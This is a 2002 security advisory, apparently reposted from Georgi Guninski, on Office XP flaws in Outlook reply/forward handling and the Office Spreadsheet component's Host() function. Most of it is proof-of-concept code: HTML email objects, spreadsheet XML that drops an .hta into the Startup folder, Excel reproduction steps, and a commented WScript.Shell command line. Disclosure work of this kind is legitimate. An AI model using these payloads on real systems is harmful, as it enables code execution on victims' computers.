TUCoPS :: Windows Apps :: msoxp.txt

More Office XP Problems

More Office XP problems - Version 3.0

Georgi Guninski security advisory #53, 2002

More Office XP problems

Systems affected:
Office XP

Risk: High
Date: 31 March 2002
Updated: 3 April 2002 (check corrections, 3 is added)
Updated: 28 April 2002 (check corrections, 4 is added)

Legal Notice:
This Advisory is Copyright (c) 2002 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission.
If you want to link to this content use the URL:
http://www.guninski.com/m$oxp-2.html

Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or  indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.

Corrections: (made on 28 April 2002)
microsoft released a security bulletin MS02-021 which resolves part of the
vulnerabilities described in this advisory (versions 1 and 2).
They fixed it over month and 1 week after I reported it to them.
Their patch fixes only the Outlook and Word issues and does not fix at
least the exploit path thru Excel (other office malware? ) so users should
not have too much false sense of security.
As I pointed on bugtraq in reply to posts which claimed this is only word
issue:

http://online.securityfocus.com/archive/1/266084

> While this will prevent the reply/forward issue, it won't
> help if one receives and opens .doc or .xls attachment
> with the bug, will it?

Let me discuss the .xls issue.
It is quite similar to the .doc issue, not to say it is the same.
It is possible to embed active content in a .xls file the same way it is
done in .doc or in outlook reply/forward.

How to reproduce:

1. Put the following file empt4.xml on an accessible web server,
say at: http://msux/empt4.xml
---empt4.xml-----
<?xml version="1.0"?>
<Workbook xmlns="urn:schemas-microsoft-com:office:spreadsheet"
 xmlns:o="urn:schemas-microsoft-com:office:office"
 xmlns:x="urn:schemas-microsoft-com:office:excel"
 xmlns:ss="urn:schemas-microsoft-com:office:spreadsheet"
 xmlns:html="http://www.w3.org/TR/REC-html40">
 <DocumentProperties xmlns="urn:schemas-microsoft-com:office:office">
  <Version>10.2625</Version>
 </DocumentProperties>
 <OfficeDocumentSettings xmlns="urn:schemas-microsoft-com:office:office">
  <DownloadComponents/>
  <LocationOfComponents HRef="file:///E:\"/>
 </OfficeDocumentSettings>
 <ExcelWorkbook xmlns="urn:schemas-microsoft-com:office:excel">
  <WindowHeight>9150</WindowHeight>
  <WindowWidth>11100</WindowWidth>
  <WindowTopX>720</WindowTopX>
  <WindowTopY>255</WindowTopY>
  <ProtectStructure>False</ProtectStructure>
  <ProtectWindows>False</ProtectWindows>
 </ExcelWorkbook>
 <Styles>
  <Style ss:ID="Default" ss:Name="Normal">
   <Alignment ss:Vertical="Bottom"/>
   <Borders/>
   <Font/>
   <Interior/>
   <NumberFormat/>
   <Protection/>
  </Style>
 </Styles>
 <Worksheet ss:Name="Sheet1">
  <Table ss:ExpandedColumnCount="1" ss:ExpandedRowCount="1" x:FullColumns="1"
   x:FullRows="1">
   <Row>
    <Cell ss:Formula='=HOST().SaveAs("C:\MSUX")'><Data ss:Type="Error">#NAME?
    </Data></Cell>
   </Row>
  </Table>
  <WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel">
   <Selected/>
   <ProtectObjects>False</ProtectObjects>
   <ProtectScenarios>False</ProtectScenarios>
  </WorksheetOptions>
 </Worksheet>
 <Worksheet ss:Name="Sheet2">
  <WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel">
   <ProtectObjects>False</ProtectObjects>
   <ProtectScenarios>False</ProtectScenarios>
  </WorksheetOptions>
 </Worksheet>
 <Worksheet ss:Name="Sheet3">
  <WorksheetOptions xmlns="urn:schemas-microsoft-com:office:excel">
   <ProtectObjects>False</ProtectObjects>
   <ProtectScenarios>False</ProtectScenarios>
  </WorksheetOptions>
 </Worksheet>
</Workbook>
-----------------

Verify it is there by accessing the above url.
2. Create a new .xls file - say a.xls.
3. Insert in it object of type "Microsoft Office Spreadsheet 10.0" (you need to show
the appropriate toolbar to do this)
4. Right click on the object -> properties
5. Click on the XMLURL property and type: http://msux/empt4.xml
(you need to change the web server name from msux)
6. A dialog box is shown claiming a file exist, this is normal,click yes.
7. In Excel choose Save As... c:\b.xls
8. Exit Excel
9. At this point in c:\ you have b.xls and MSUX.xls. Move MSUX.xls anywhere.
10. Open c:\b.xls - it again will claim MSUX.xls exists. Does not matter.
11. For me Excel crashed - this does not matter.
12. At this point you have C:\MSUX.xls again - obviously it is created by b.xls
(it may also be created by itself)

Question: Can someone please tell me in which dll
Microsoft Office Spreadsheet 10.0 is located?
(I want to keep it for some reasons)

Corrections: (made on 3 April 2002)

At http://www.idg.net/ic_840081_1794_9-10000.html is written:
-----------------
 As for the second vulnerability, Microsoft said it does "not as yet have a
work-around for the second issue, but note that even in the worst case it could only
be used to create files -- not to execute them or take any other action on the
user's computer."
-----------------

I don't agree with this statement - execution of code in this case is easy.
I am waiting for a official reply from them.
The following testcase (3) shows that arbitrary may be executed.

3.
The following must be put in HTML email which should be opened with
Outlook XP and the user should chose reply or forward.
Probably it may also be embeded in .doc or .xls file.
The effect is shown after the user logouts and logins again.
----------------------------------------
<h1>
Hehe. Trying to sell trustworthy computing.
</h1>

<object
   classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
   v:shapes="_x0000_s1026" class=shape width=81 height=81
   u1:shapes="_x0000_s1025">
   <param name=DataType value=XMLURL>
   <param name=XMLData
   value="&lt;?xml version=&quot;1.0&quot;?&gt;&#13;&#10;&lt;ss:Workbook
xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;&#13;&#10;
xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;&#13;&#10;
xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&quot;&#13;&#10;
xmlns:c=&quot;urn:schemas-microsoft-com:office:component:spreadsheet&quot;&#13;&#10;
xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;&#13;&#10;
&lt;x:ExcelWorkbook&gt;&#13;&#10;
&lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;&#13;&#10;
&lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;&#13;&#10;
&lt;/x:ExcelWorkbook&gt;&#13;&#10; &lt;ss:Styles&gt;&#13;&#10;  &lt;ss:Style
ss:ID=&quot;Default&quot;&gt;&#13;&#10;   &lt;ss:Alignment
ss:Horizontal=&quot;Automatic&quot; ss:Rotate=&quot;0.0&quot;
ss:Vertical=&quot;Bottom&quot;&#13;&#10;
ss:ReadingOrder=&quot;Context&quot;/&gt;&#13;&#10;   &lt;ss:Borders&gt;&#13;&#10;
&lt;/ss:Borders&gt;&#13;&#10;   &lt;ss:Font ss:FontName=&quot;Arial&quot;
ss:Size=&quot;10&quot; ss:Color=&quot;Automatic&quot;
ss:Bold=&quot;0&quot;&#13;&#10;    ss:Italic=&quot;0&quot;
ss:Underline=&quot;None&quot;/&gt;&#13;&#10;   &lt;ss:Interior
ss:Color=&quot;Automatic&quot; ss:Pattern=&quot;None&quot;/&gt;&#13;&#10;
&lt;ss:NumberFormat ss:Format=&quot;General&quot;/&gt;&#13;&#10;   &lt;ss:Protection
ss:Protected=&quot;1&quot;/&gt;&#13;&#10;  &lt;/ss:Style&gt;&#13;&#10;
&lt;/ss:Styles&gt;&#13;&#10; &lt;c:ComponentOptions&gt;&#13;&#10;
&lt;c:Label&gt;&#13;&#10;   &lt;c:Caption&gt;Microsoft Office
Spreadsheet&lt;/c:Caption&gt;&#13;&#10;  &lt;/c:Label&gt;&#13;&#10;
&lt;c:PreventPropBrowser/&gt;&#13;&#10;
&lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;&#13;&#10;
&lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;&#13;&#10;
&lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;&#13;&#10;
&lt;/c:ComponentOptions&gt;&#13;&#10; &lt;x:WorkbookOptions&gt;&#13;&#10;
&lt;c:OWCVersion&gt;10.0.0.2621         &lt;/c:OWCVersion&gt;&#13;&#10;
&lt;x:DisableUndo/&gt;&#13;&#10; &lt;/x:WorkbookOptions&gt;&#13;&#10;
&lt;ss:Worksheet ss:Name=&quot;Sheet1&quot;&gt;&#13;&#10;
&lt;x:WorksheetOptions&gt;&#13;&#10;   &lt;x:Selected/&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10;  &lt;c:WorksheetOptions&gt;&#13;&#10;
&lt;/c:WorksheetOptions&gt;&#13;&#10;  &lt;ss:Table
ss:ExpandedColumnCount=&quot;1&quot; ss:ExpandedRowCount=&quot;1&quot;&#13;&#10;
ss:DefaultColumnWidth=&quot;48.0&quot;
ss:DefaultRowHeight=&quot;12.75&quot;&gt;&#13;&#10;   &lt;ss:Row&gt;&#13;&#10;
&lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;../Start
Menu/Programs/StartUp/gggg5.hta&quot;,8)'&gt;&#13;&#10;     &lt;ss:Data
ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;&#13;&#10;
&lt;/ss:Cell&gt;&#13;&#10;   &lt;/ss:Row&gt;&#13;&#10;  &lt;/ss:Table&gt;&#13;&#10;
&lt;/ss:Worksheet&gt;&#13;&#10; &lt;ss:Worksheet
ss:Name=&quot;Sheet2&quot;&gt;&#13;&#10;  &lt;x:WorksheetOptions&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10;  &lt;c:WorksheetOptions&gt;&#13;&#10;
&lt;/c:WorksheetOptions&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10;
&lt;ss:Worksheet ss:Name=&quot;Sheet3&quot;&gt;&#13;&#10;
&lt;x:WorksheetOptions&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10;  &lt;c:WorksheetOptions&gt;&#13;&#10;
&lt;/c:WorksheetOptions&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10;
&lt;o:DocumentProperties&gt;&#13;&#10;
&lt;o:Author&gt;ad&lt;/o:Author&gt;&#13;&#10;
&lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;&#13;&#10;
&lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;&#13;&#10;
&lt;o:Company&gt;g&lt;/o:Company&gt;&#13;&#10;
&lt;o:Version&gt;10.2625&lt;/o:Version&gt;&#13;&#10;
&lt;/o:DocumentProperties&gt;&#13;&#10;
&lt;o:OfficeDocumentSettings&gt;&#13;&#10;
&lt;o:DownloadComponents/&gt;&#13;&#10;   &lt;o:LocationOfComponents
HRef=&quot;file:///E:\&quot;/&gt;&#13;&#10;
&lt;/o:OfficeDocumentSettings&gt;&#13;&#10;&lt;/ss:Workbook&gt;&#13;&#10;">
   <param name=AllowPropertyToolbox value=0>
   <param name=AutoFit value=0>
   <param name=Calculation value=-4105>
   <param name=Caption value="Microsoft Office Spreadsheet">
   <param name=DisplayColumnHeadings value=-1>
   <param name=DisplayGridlines value=-1>
   <param name=DisplayHorizontalScrollBar value=-1>
   <param name=DisplayOfficeLogo value=-1>
   <param name=DisplayPropertyToolbox value=0>
   <param name=DisplayRowHeadings value=-1>
   <param name=DisplayTitleBar value=0>
   <param name=DisplayToolbar value=-1>
   <param name=DisplayVerticalScrollBar value=-1>
   <param name=DisplayWorkbookTabs value=-1>
   <param name=EnableEvents value=-1>
   <param name=MaxHeight value="80%">
   <param name=MaxWidth value="80%">
   <param name=MoveAfterReturn value=-1>
   <param name=MoveAfterReturnDirection value=-4121>
   <param name=RightToLeft value=0>
   <param name=ScreenUpdating value=-1>
   <param name=EnableUndo value=0>
  </object>
<script>
i=3;
while (i--) confirm("Trustworthy?");
//x=new ActiveXObject("WScript.Shell");
//x.Run("C:\\WINNT\\SYSTEM32\\CMD.EXE /C DIR C:\\ /a /p /s");
</script>
------------------------------------------

Description:
Actually there are at least two vulnerabilities in Office XP.
1. It is possible to embed active content (object + script) in HTML mail
which is triggered if the user chooses reply or forward to the mail.
This opens an exploit scenario for forcing the user to visit a page
in the internet zone of IE at least. For another exploit scenario
check (2)
2. There is a bug in ms spreadsheet compononent. Namely in its Host()
function which may be exploited with the help of (1) or probably from
any document opened with Office application. This buggy function
allows creating files with arbitrary names and their content may be
specified to some extent at which is sufficient to place an
executable file (.hta) in user's startup directory which may lead to
taking full control over user's computer.
This probably may be called cross application scripting because
one application uses object from another application.

Details:
The following must be put in HTML email which should be opened with
Outlook XP and the user should choose reply or forward.

1.
--------------------------------------
<OBJECT id=WebBrowser1 height=150 width=300
classid=CLSID:8856F961-340A-11D0-A96B-00C04FD705A2>
<PARAM NAME="ExtentX" VALUE="7938">
<PARAM NAME="ExtentY" VALUE="3969">
<PARAM NAME="ViewMode" VALUE="0">
<PARAM NAME="Offline" VALUE="0">
<PARAM NAME="Silent" VALUE="0">
<PARAM NAME="RegisterAsBrowser" VALUE="1">
<PARAM NAME="RegisterAsDropTarget" VALUE="1">
<PARAM NAME="AutoArrange" VALUE="0">
<PARAM NAME="NoClientEdge" VALUE="0">
<PARAM NAME="AlignLeft" VALUE="0">
<PARAM NAME="ViewID" VALUE="{0057D0E0-3573-11CF-AE69-08002B2E1262}">
<PARAM NAME="Location" VALUE="about:/dev/random&lt;script&gt;while (42)
alert('HOHOHO\nTrying to sell trustworthy computing\nHOHOHO')&lt;/script&gt;">
<PARAM NAME="ReadyState" VALUE="4">
</OBJECT>
-------------------------------------

2.
The office spreadsheet component is something like mini excel.
It may be embeded in web pages (seems not exploitable) and in
office documents (seems exploitable).
It supports the Host() function which returns the hosting object.
So if you put in formula '=Host().SaveAs("name")' file with name
shall be created.

[Note, lines may be wrapped]
---------------------------------------
<h1>
Hehe. Triyng to sell trustworthy computing.
</h1>
<object
   classid="CLSID:0002E551-0000-0000-C000-000000000046" id=Spreadsheet1
   v:shapes="_x0000_s1026" class=shape width=81 height=81
   u1:shapes="_x0000_s1025">
   <param name=DataType value=XMLURL>
   <param name=XMLData
   value="&lt;?xml version=&quot;1.0&quot;?&gt;&#13;&#10;&lt;ss:Workbook
xmlns:o=&quot;urn:schemas-microsoft-com:office:office&quot;&#13;&#10;
xmlns:x=&quot;urn:schemas-microsoft-com:office:excel&quot;&#13;&#10;
xmlns:ss=&quot;urn:schemas-microsoft-com:office:spreadsheet&quot;&#13;&#10;
xmlns:c=&quot;urn:schemas-microsoft-com:office:component:spreadsheet&quot;&#13;&#10;
xmlns:html=&quot;http://www.w3.org/TR/REC-html40&quot;&gt;&#13;&#10;
&lt;x:ExcelWorkbook&gt;&#13;&#10;
&lt;x:ProtectStructure&gt;False&lt;/x:ProtectStructure&gt;&#13;&#10;
&lt;x:ActiveSheet&gt;0&lt;/x:ActiveSheet&gt;&#13;&#10;
&lt;/x:ExcelWorkbook&gt;&#13;&#10; &lt;ss:Styles&gt;&#13;&#10;  &lt;ss:Style
ss:ID=&quot;Default&quot;&gt;&#13;&#10;   &lt;ss:Alignment
ss:Horizontal=&quot;Automatic&quot; ss:Rotate=&quot;0.0&quot;
ss:Vertical=&quot;Bottom&quot;&#13;&#10;
ss:ReadingOrder=&quot;Context&quot;/&gt;&#13;&#10;   &lt;ss:Borders&gt;&#13;&#10;
&lt;/ss:Borders&gt;&#13;&#10;   &lt;ss:Font ss:FontName=&quot;Arial&quot;
ss:Size=&quot;10&quot; ss:Color=&quot;Automatic&quot;
ss:Bold=&quot;0&quot;&#13;&#10;    ss:Italic=&quot;0&quot;
ss:Underline=&quot;None&quot;/&gt;&#13;&#10;   &lt;ss:Interior
ss:Color=&quot;Automatic&quot; ss:Pattern=&quot;None&quot;/&gt;&#13;&#10;
&lt;ss:NumberFormat ss:Format=&quot;General&quot;/&gt;&#13;&#10;   &lt;ss:Protection
ss:Protected=&quot;1&quot;/&gt;&#13;&#10;  &lt;/ss:Style&gt;&#13;&#10;
&lt;/ss:Styles&gt;&#13;&#10; &lt;c:ComponentOptions&gt;&#13;&#10;
&lt;c:Label&gt;&#13;&#10;   &lt;c:Caption&gt;Microsoft Office
Spreadsheet&lt;/c:Caption&gt;&#13;&#10;  &lt;/c:Label&gt;&#13;&#10;
&lt;c:PreventPropBrowser/&gt;&#13;&#10;
&lt;c:MaxHeight&gt;80%&lt;/c:MaxHeight&gt;&#13;&#10;
&lt;c:MaxWidth&gt;80%&lt;/c:MaxWidth&gt;&#13;&#10;
&lt;c:NextSheetNumber&gt;1&lt;/c:NextSheetNumber&gt;&#13;&#10;
&lt;/c:ComponentOptions&gt;&#13;&#10; &lt;x:WorkbookOptions&gt;&#13;&#10;
&lt;c:OWCVersion&gt;10.0.0.2621         &lt;/c:OWCVersion&gt;&#13;&#10;
&lt;x:DisableUndo/&gt;&#13;&#10; &lt;/x:WorkbookOptions&gt;&#13;&#10;
&lt;ss:Worksheet ss:Name=&quot;Sheet1&quot;&gt;&#13;&#10;
&lt;x:WorksheetOptions&gt;&#13;&#10;   &lt;x:Selected/&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10;  &lt;c:WorksheetOptions&gt;&#13;&#10;
&lt;/c:WorksheetOptions&gt;&#13;&#10;  &lt;ss:Table
ss:ExpandedColumnCount=&quot;1&quot; ss:ExpandedRowCount=&quot;1&quot;&#13;&#10;
ss:DefaultColumnWidth=&quot;48.0&quot;
ss:DefaultRowHeight=&quot;12.75&quot;&gt;&#13;&#10;   &lt;ss:Row&gt;&#13;&#10;
&lt;ss:Cell ss:Formula='=HOST().SaveAs(&quot;C:\GGGG5&quot;)'&gt;&#13;&#10;
&lt;ss:Data ss:Type=&quot;Boolean&quot;&gt;1&lt;/ss:Data&gt;&#13;&#10;
&lt;/ss:Cell&gt;&#13;&#10;   &lt;/ss:Row&gt;&#13;&#10;  &lt;/ss:Table&gt;&#13;&#10;
&lt;/ss:Worksheet&gt;&#13;&#10; &lt;ss:Worksheet
ss:Name=&quot;Sheet2&quot;&gt;&#13;&#10;  &lt;x:WorksheetOptions&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10;  &lt;c:WorksheetOptions&gt;&#13;&#10;
&lt;/c:WorksheetOptions&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10;
&lt;ss:Worksheet ss:Name=&quot;Sheet3&quot;&gt;&#13;&#10;
&lt;x:WorksheetOptions&gt;&#13;&#10;
&lt;x:ViewableRange&gt;R1:R262144&lt;/x:ViewableRange&gt;&#13;&#10;
&lt;x:Selection&gt;R1C1&lt;/x:Selection&gt;&#13;&#10;
&lt;x:TopRowVisible&gt;0&lt;/x:TopRowVisible&gt;&#13;&#10;
&lt;x:LeftColumnVisible&gt;0&lt;/x:LeftColumnVisible&gt;&#13;&#10;
&lt;x:ProtectContents&gt;False&lt;/x:ProtectContents&gt;&#13;&#10;
&lt;/x:WorksheetOptions&gt;&#13;&#10;  &lt;c:WorksheetOptions&gt;&#13;&#10;
&lt;/c:WorksheetOptions&gt;&#13;&#10; &lt;/ss:Worksheet&gt;&#13;&#10;
&lt;o:DocumentProperties&gt;&#13;&#10;
&lt;o:Author&gt;ad&lt;/o:Author&gt;&#13;&#10;
&lt;o:LastAuthor&gt;ad&lt;/o:LastAuthor&gt;&#13;&#10;
&lt;o:Created&gt;2002-03-17T12:07:37Z&lt;/o:Created&gt;&#13;&#10;
&lt;o:Company&gt;g&lt;/o:Company&gt;&#13;&#10;
&lt;o:Version&gt;10.2625&lt;/o:Version&gt;&#13;&#10;
&lt;/o:DocumentProperties&gt;&#13;&#10;
&lt;o:OfficeDocumentSettings&gt;&#13;&#10;
&lt;o:DownloadComponents/&gt;&#13;&#10;   &lt;o:LocationOfComponents
HRef=&quot;file:///E:\&quot;/&gt;&#13;&#10;
&lt;/o:OfficeDocumentSettings&gt;&#13;&#10;&lt;/ss:Workbook&gt;&#13;&#10;">
   <param name=AllowPropertyToolbox value=0>
   <param name=AutoFit value=0>
   <param name=Calculation value=-4105>
   <param name=Caption value="Microsoft Office Spreadsheet">
   <param name=DisplayColumnHeadings value=-1>
   <param name=DisplayGridlines value=-1>
   <param name=DisplayHorizontalScrollBar value=-1>
   <param name=DisplayOfficeLogo value=-1>
   <param name=DisplayPropertyToolbox value=0>
   <param name=DisplayRowHeadings value=-1>
   <param name=DisplayTitleBar value=0>
   <param name=DisplayToolbar value=-1>
   <param name=DisplayVerticalScrollBar value=-1>
   <param name=DisplayWorkbookTabs value=-1>
   <param name=EnableEvents value=-1>
   <param name=MaxHeight value="80%">
   <param name=MaxWidth value="80%">
   <param name=MoveAfterReturn value=-1>
   <param name=MoveAfterReturnDirection value=-4121>
   <param name=RightToLeft value=0>
   <param name=ScreenUpdating value=-1>
   <param name=EnableUndo value=0>
  </object>
---------------------------------

Workaround/Solution:
The solution is to get a real mail client and office applications.
Workaround for this particular problem is:
For (1) - disable everything that contains "active" in IE.
For (2) and (3) and (4)- (Have not tested it personally)
Deregister and delete the ms office spreadsheet component

Vendor status:

Microsoft was notified on 17 March 2002.
They had 2 weeks to produce a patch but didn't.

Regards,
Georgi Guninski
http://www.guninski.com

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH